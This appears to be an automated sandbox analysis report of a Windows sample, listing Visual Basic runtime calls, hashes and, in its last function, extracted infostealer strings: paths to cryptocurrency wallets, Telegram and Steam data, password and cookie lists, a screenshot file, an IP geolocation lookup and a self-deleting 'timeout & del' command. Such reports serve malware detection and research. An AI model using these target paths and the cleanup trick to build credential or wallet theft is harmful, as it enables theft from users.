__vbaObjSetAddref.MSVBVM60(00000000), ref: 004FE290
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000010), ref: 004FE2A9
__vbaFreeObj.MSVBVM60 ref: 004FE2B1

Strings

`#P, xrefs: 004FE1CA
`#P, xrefs: 004FE1C3

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$New2$CheckHresult$AddrefFree
String ID: `#P$`#P
API String ID: 2792052285-498400788
Opcode ID: cec386dcab4af89c840fbeacf8b82dd46d9aa4483b554efbf3051b4d886c3665
Instruction ID: 4052b10ba84fb7bb084cc6bfabaa2bef48cab23df0a1f422f13b2d25cbbdfc04
Opcode Fuzzy Hash: cec386dcab4af89c840fbeacf8b82dd46d9aa4483b554efbf3051b4d886c3665
Instruction Fuzzy Hash: 2D31A170900708FFCB01EF6ACC86BAE7BB8BF09715F10442AF601BB2E1C6785545CA99

Function 004FAB46 Relevance: 15.1, APIs: 10, Instructions: 79COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(?,?,?), ref: 004FAB86
#644.MSVBVM60(?,?,?), ref: 004FAB91
__vbaI4Var.MSVBVM60(?,00000000,?,?,?), ref: 004FAB9B
#698.MSVBVM60(?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 004FABD4
__vbaVarCat.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABE5
__vbaVarMove.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABEF
__vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABF7
__vbaVarAdd.MSVBVM60(?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC1E
__vbaVarMove.MSVBVM60(?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC28
__vbaFreeVar.MSVBVM60(004FAC63,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC5D

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$FreeMove$#644#698
String ID:
API String ID: 674645869-0
Opcode ID: ca0fcf941a29d05972b4687a39160fdfec10ea9df9ad026500247ea666b91e31
Instruction ID: 843a9af323782a1e8ec9acdb8992f9b74832ee7e913ded6d512d3c3ca07667d0
Opcode Fuzzy Hash: ca0fcf941a29d05972b4687a39160fdfec10ea9df9ad026500247ea666b91e31
Instruction Fuzzy Hash: D73161B5D01248ABCB11EFD5C981ADEB7BDBB18704F60013FB605B72A1D6386B0ACB55

Function 004FD301 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,00502300,0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FD342
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 004FD36B
#526.MSVBVM60(?,00007FFF), ref: 004FD385
__vbaStrVarMove.MSVBVM60(?,?,00007FFF), ref: 004FD38E
__vbaStrMove.MSVBVM60(?,?,00007FFF), ref: 004FD398
__vbaFreeVar.MSVBVM60(?,?,00007FFF), ref: 004FD3A0
#644.MSVBVM60(?,?,?,00007FFF), ref: 004FD3A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FD3D2
__vbaFreeObj.MSVBVM60(004FD3FE,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 004FD3F8

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$CheckFreeHresultMove$#526#644Addref
String ID:
API String ID: 3607658185-0
Opcode ID: 464c82a357c2343bb659ab53c8af77b301269f7fdae60c949a7c9ac6595e9320
Instruction ID: 48b061f47ae894beafa627ec204288505a1a07ddecc0fdafbb64daeb47b10728
Opcode Fuzzy Hash: 464c82a357c2343bb659ab53c8af77b301269f7fdae60c949a7c9ac6595e9320
Instruction Fuzzy Hash: 79212A71D0021DABCF04EB95CC46EAFBB7AFF48B04F10452AF701B62A1D778A5058B99

Function 004FE39E Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

#593.MSVBVM60(?), ref: 004FE3DD
__vbaNew2.MSVBVM60(0040CC40,?,?), ref: 004FE3F6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC30,00000024), ref: 004FE416
__vbaR8IntI4.MSVBVM60(00000000,?,0040CC30,00000024), ref: 004FE427
__vbaFreeVar.MSVBVM60(00000000,?,0040CC30,00000024), ref: 004FE432
__vbaNew2.MSVBVM60(0040AC34,005033DC), ref: 004FE449
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CB70,000006FC), ref: 004FE46F

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$CheckHresultNew2$#593Free
String ID:
API String ID: 2147906589-0
Opcode ID: cbfc631e05a34efd2f922cba0dc4ce40c2cd455f486ba8eae33f39e0543d2186
Instruction ID: c58023b431af339495e757aa362484ba1d8cd1898518df1627ef99c8a6378f6f
Opcode Fuzzy Hash: cbfc631e05a34efd2f922cba0dc4ce40c2cd455f486ba8eae33f39e0543d2186
Instruction Fuzzy Hash: 3021A1B0541219FBCB10AF92DD8AADE7BB8FF09745F10052EF104B75A1C7B86904CA99

Function 004FB2BA Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB2FE
__vbaStrMove.MSVBVM60(0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB308
__vbaStrCat.MSVBVM60(0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB313
__vbaStrMove.MSVBVM60(0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB31D
__vbaI4Str.MSVBVM60(00000000,0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB323
__vbaSetSystemError.MSVBVM60(000000FF,00000000,00000000,0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB330
__vbaFreeStrList.MSVBVM60(00000002,?,?,000000FF,00000000,00000000,0040BEA0,00000000,0040BE94,0040BE7C,?,00000004,00000000), ref: 004FB33F

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Move$ErrorFreeListSystem
String ID:
API String ID: 3013914016-0
Opcode ID: 448b01fc3d8c0d261208059594efe13bcfe9d2dbee30402c65e783a46aa5fd4e
Instruction ID: 46b0c2a8571a8c386f4af7a4d9249c1d95d028fdae5a0a7923a1290111d38a8c
Opcode Fuzzy Hash: 448b01fc3d8c0d261208059594efe13bcfe9d2dbee30402c65e783a46aa5fd4e
Instruction Fuzzy Hash: FC0144B5D402096AD704EBA5CC43FBF76BCEB09704F20023BB711B65D2E678590586E9

Function 004FB051 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60 ref: 004FB08E
__vbaStrVarVal.MSVBVM60(?,00000000), ref: 004FB098
#644.MSVBVM60(00000000,?,00000000), ref: 004FB09E
__vbaVarMove.MSVBVM60(00000000,?,00000000), ref: 004FB0B3
__vbaFreeStr.MSVBVM60(00000000,?,00000000), ref: 004FB0BB

Strings

`"P, xrefs: 004FB073

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$#644FreeMoveNofreeVarg
String ID: `"P
API String ID: 4093157337-2068776422
Opcode ID: 8bc5b615c7b25cf412e4c79563c0073754f66f9a790e8da39697553812b34b84
Instruction ID: 0209cf69d2a01a5617c20b319aee73f37e35b577f12764baf66fd4787d48d3eb
Opcode Fuzzy Hash: 8bc5b615c7b25cf412e4c79563c0073754f66f9a790e8da39697553812b34b84
Instruction Fuzzy Hash: B401E4B1C00208AECB04EFA5C986ADEBFF8FF1C714F10412AE505B6691EB7855498BA5

Function 004FF016 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000001,00503340,00000011,00000001,00004000,00000000,0040BEAC,00000080,00000000,?,?,004FEF83,00000000,0040BEAC,00000080), ref: 004FF05E
__vbaAryLock.MSVBVM60(?,00503340,0040BEAC), ref: 004FF099
#644.MSVBVM60(?,?,00503340,0040BEAC), ref: 004FF0B0
__vbaAryUnlock.MSVBVM60(?,?,?,00503340,0040BEAC), ref: 004FF0BB

Strings

@3P, xrefs: 004FF03E, 004FF063, 004FF09E, 004FF0C0

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$#644LockRedimUnlock
String ID: @3P
API String ID: 3120749027-282812438
Opcode ID: 6c56408341afe6ce80f2b41602f392f00ab1dc42bda323abeb62ea65931c6704
Instruction ID: 17d2c46d9555b6335bc1a554783d5138d4e97924127e696c63463a8f8f4870db
Opcode Fuzzy Hash: 6c56408341afe6ce80f2b41602f392f00ab1dc42bda323abeb62ea65931c6704
Instruction Fuzzy Hash: 6A218E75910209AFCB14DF94C985F6EBBB9FF08704F148169E2006B3A2D6B9AD44CB54

Function 004FFB2A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60 ref: 004FFB60
__vbaStrVarVal.MSVBVM60(00000000,00000000), ref: 004FFB6A
#644.MSVBVM60(00000000,00000000,00000000), ref: 004FFB70
__vbaFreeStr.MSVBVM60(00000000,00000000,00000000), ref: 004FFB7B

Strings

p$P, xrefs: 004FFB4B

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$#644FreeNofreeVarg
String ID: p$P
API String ID: 1185345826-825426192
Opcode ID: 4e1f357f71960cc191139a3533fb859c30b21aad1b1931bc43690e11ee25c411
Instruction ID: 7836de18134fb4dd7652f6dfee1493c86dc6f5af55631b9e800786055baf4676
Opcode Fuzzy Hash: 4e1f357f71960cc191139a3533fb859c30b21aad1b1931bc43690e11ee25c411
Instruction Fuzzy Hash: 92F03AB1810208ABCB04EBA5C94AFEFBFBCEF18715F50012AB20176592D77869448AA5

Function 004FEF43 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 004FF016: __vbaRedim.MSVBVM60(00000080,00000001,00503340,00000011,00000001,00004000,00000000,0040BEAC,00000080,00000000,?,?,004FEF83,00000000,0040BEAC,00000080), ref: 004FF05E
Part of subcall function 004FF016: __vbaAryLock.MSVBVM60(?,00503340,0040BEAC), ref: 004FF099
Part of subcall function 004FF016: #644.MSVBVM60(?,?,00503340,0040BEAC), ref: 004FF0B0
Part of subcall function 004FF016: __vbaAryUnlock.MSVBVM60(?,?,?,00503340,0040BEAC), ref: 004FF0BB

#644.MSVBVM60(?,00000000,0040BEAC,00000080), ref: 004FEF8D
#644.MSVBVM60(?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFA5
#644.MSVBVM60(00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFC5
#644.MSVBVM60(00000000,00000000,00000000,00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFD7
#644.MSVBVM60(00000000,00000000,00000000,00000000,00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFE3

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: #644$__vba$LockRedimUnlock
String ID:
API String ID: 1414640885-0
Opcode ID: 317673dbd47c54470bb08f1437a09c970dad7a930685ead75c0a7c072fb8d865
Instruction ID: 51d5c8c719c9f0f4d8c7753107f273c6214d421ceb11882ef4af490040c30773
Opcode Fuzzy Hash: 317673dbd47c54470bb08f1437a09c970dad7a930685ead75c0a7c072fb8d865
Instruction Fuzzy Hash: C311BAB0C0020AAADF14EFA1CD4AEEFBBB9EB15349F10452AB500B6652D77C5A058A65

Function 004FAA72 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

#644.MSVBVM60(00000000,004FA88C,00000001), ref: 004FAABE
#644.MSVBVM60(00000001,00000000,004FA88C,00000001), ref: 004FAACC
#644.MSVBVM60(00000000,00000000,00000000,00000001,00000000,004FA88C,00000001), ref: 004FAAE1
#644.MSVBVM60(-00000004,00000000,00000004,00000000,00000000,00000000,00000001,00000000,004FA88C,00000001), ref: 004FAB00

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: #644
String ID:
API String ID: 700137900-0
Opcode ID: 1f4c41050390b48f0ff15eeca467d064449abbffe8c5838a70dc4f01f83adcfb
Instruction ID: 13f212d88646129eb27942f08bd3d22bc17234d43ec0fdcaa7d4dbd030c5548e
Opcode Fuzzy Hash: 1f4c41050390b48f0ff15eeca467d064449abbffe8c5838a70dc4f01f83adcfb
Instruction Fuzzy Hash: 8C1154B1900205AFD715FFA5CD06FAE7BBCEB19718F10025AF201B7292D67D9A08C669

Function 004FE86A Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040C9C4,00503BA8,?,?,?,?,?,?,?,?,00401006), ref: 004FE8C1
__vbaObjSetAddref.MSVBVM60(?,005023C0,?,?,?,?,?,?,?,?,00401006), ref: 004FE8D6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000010,?,?,?,?,?,?,?,?,00401006), ref: 004FE8F2
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401006), ref: 004FE8FA

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$AddrefCheckFreeHresultNew2
String ID:
API String ID: 1649212984-0
Opcode ID: 81fcb9b75f914e846749a17c2d6ed7b8281b26d2a60e68ca3f040f200ac16b6b
Instruction ID: 56571d18a730aa7d9d2030c789b1182546dbef383d1c58afbb6e1b856ceb0bec
Opcode Fuzzy Hash: 81fcb9b75f914e846749a17c2d6ed7b8281b26d2a60e68ca3f040f200ac16b6b
Instruction Fuzzy Hash: 081173B5940608FFC710EF5ACC86EAEBFB8EF58705F20802AF105B72E1C27855449BA4

Function 004FEEAF Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

#644.MSVBVM60(?), ref: 004FEEB9
#644.MSVBVM60(?,004A7914,00000000,?), ref: 004FEECE
#644.MSVBVM60(?,004A7924,00000000,?,004A7914,00000000,?), ref: 004FEEE3
#644.MSVBVM60(?,004A7904,00000000,?,004A7924,00000000,?,004A7914,00000000,?), ref: 004FEEFA

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: #644
String ID:
API String ID: 700137900-0
Opcode ID: b270ac067bdccd4c5039093e1d57dedaee63b6f14b21fe68c0aaaca15adb1efa
Instruction ID: 174d3e7d2b5dd1a887ee2e0b90b2af9f90e980db0b8c4893c08a7a3f0c43c921
Opcode Fuzzy Hash: b270ac067bdccd4c5039093e1d57dedaee63b6f14b21fe68c0aaaca15adb1efa
Instruction Fuzzy Hash: 9EF068B11042087AEF113F738C02DBF3B6DEF56798701406BFA046B271C97D891186A8

Analysis Process: UoktqWamLR.exePID: 6164, Parent PID: 4952COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	6

Executed Functions

Function 004186C4 Relevance: 102.6, APIs: 4, Strings: 54, Instructions: 1056
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00418751

Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C

GetSystemMetrics.USER32(00000001), ref: 00418B0C
GetSystemMetrics.USER32(00000000), ref: 00418B14
ExitProcess.KERNEL32(00000000), ref: 00419657

Strings

Coins\Ethereum, xrefs: 004189E4
<info, xrefs: 00419260
<c>, xrefs: 0041883A
"countryCode":", xrefs: 00418F66
</file, xrefs: 0041931C
UTC*, xrefs: 004189E9
Coins\Electrum, xrefs: 00418992
*.json,*.seco, xrefs: 00418A12
Coins\MultiBitHD, xrefs: 00418A65
Coins\Exodus, xrefs: 00418A0D
%comspec%, xrefs: 00419571
<, xrefs: 00419547
</d>, xrefs: 00418890
image/jpeg, xrefs: 00418B01
</coks, xrefs: 004192E4
<n>, xrefs: 00418861
exit, xrefs: 0041881B
Skype, xrefs: 00418AA4
%appdata%\Electrum-LTC\wallets\, xrefs: 004189C5
mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml, xrefs: 00418A6A
Telegram, xrefs: 00418AC7
%appdata%\Telegram Desktop\tdata\, xrefs: 00418AD1
Coins\Jaxx\Local Storage\, xrefs: 00418A39
</c>, xrefs: 00418832
%DSK_, xrefs: 00418B71, 00418B8E, 00418C17
%APPDATA%\Jaxx\Local Storage\, xrefs: 00418A43
Files\, xrefs: 00418D72, 00418E4D
</info, xrefs: 00419274
</ip, xrefs: 00419364
%APPDATA%\Ethereum\keystore\, xrefs: 004189EE
Coins\Electrum-LTC, xrefs: 004189BB
++++, xrefs: 00418FB5
T_@, xrefs: 00419403, 0041981E
PasswordsList.txt, xrefs: 00418921
%APPDATA%\MultiBitHD\, xrefs: 00418A6F
<pwds, xrefs: 0041928A
System.txt, xrefs: 00418FE4
%APPDATA%\Exodus\, xrefs: 00418A17
<coks, xrefs: 004192C2
"query":", xrefs: 00418F50
Coins, xrefs: 0041897B
GET, xrefs: 00418F33
Steam, xrefs: 00418AE7
</n>, xrefs: 00418859
<file, xrefs: 004192FA
ip.txt, xrefs: 00418F91, 00418FA3
<ip, xrefs: 00419348
/c %WINDIR%\system32\timeout.exe 3 & del ", xrefs: 00419592
scr.jpg, xrefs: 00418B21
http://ip-api.com/json, xrefs: 00418F3A
D877F783D5*,map*, xrefs: 00418ACC
<d>, xrefs: 00418898
%appdata%\Electrum\wallets\, xrefs: 0041899C
</pwds, xrefs: 004192AC

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: Create$AddressDirectoryMetricsProcSystem$ExitLibraryLoadMutexProcess
